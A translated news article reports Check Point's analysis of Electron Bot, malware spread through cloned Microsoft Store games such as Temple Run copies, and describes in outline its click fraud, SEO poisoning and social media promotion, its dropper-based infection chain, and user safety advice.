According to the Bleeping Computer website, a malicious program called Electron Bot has entered Microsoft’s official store by cloning popular games such as Subway Surfer and Temple Run, infecting about 5,000 computers in Sweden, Israel, Spain, and Bermuda.
Cyber intelligence firm Check Point discovered and analyzed the malware, which gives attackers complete control of infected devices and supports remote command execution and real-time interaction. The attackers’ main purpose is to achieve social media promotion and click fraud by controlling social media accounts on Facebook, Google, YouTube, and Sound Cloud.
Evolution that took three years
Electron Bot’s trial was first discovered in 2018 when the attacker-made photo album app Google Photos appeared in the Microsoft Store, and since then, they have added some new features to the tool, such as advanced detection avoidance, dynamic script loading.
Because it is written in Electron, the Electron Bot gets its name, which can access websites and perform related actions by simulating the browsing behavior of natural people. To do this, it uses the Chromium engine in the Electron framework to open a new hidden browser window, set the appropriate HTTP headers, display the requested HTML page, and finally perform mouse movements, scrolls, clicks, and keyboard input.
When checkpoint researchers analyzed its activities, they found that the main activities of Electron Bot were:
SEO poisoning – creating malware delivery sites that rank high in Google search results;
Ad clicks – connect to a remote site in the background and click on an ad that is not viewable;
Social Media Account Promotion – Directs traffic to specific content on social media platforms.
Online product promotions – Increase your store’s rating by clicking on their ads.
It can be seen that Electron Bot is a middleman who provides corresponding functions and services to those who try to increase illegal profits and earn from them.
Commands supported by Electron Bot
Chain of infection
The chain of infection begins when the victim installs cloned game software from the Microsoft Store, and at startup, a JavaScript dropper is dynamically loaded in the background to get the payload of the Electron Bot and install it. The malware runs on the next time the system starts and connects to C2, retrieves its configuration, and executes arbitrary commands from the attacker. Since the main script loads dynamically at runtime, the JS file stored in the device’s memory is very small and looks harmless.
More than just a game
Check Point found that all cloned games have the malicious features described above, and because these operations are carried out “behind the scenes” and are highly covert, these games have relatively good user reviews, such as Temple Endless Runner 2 released on September 6, 2021, which has received a large number of five-star reviews out of 92 reviews. Of course, attackers are constantly refreshing their bait, using different game titles and apps to pass the malware payload to unsuspecting victims.
Cloned Temple Of Thrones 2 game on the Microsoft Store
While existing versions of Electron Bot won’t cause catastrophic damage to infected devices, attackers could modify code to get second-stage payloads, such as RAT or even ransomware.
Check Point recommends that Windows users avoid downloading software with too few comments and double-check the details of the developer or publisher to make sure the name is correct and there are no spelling errors.
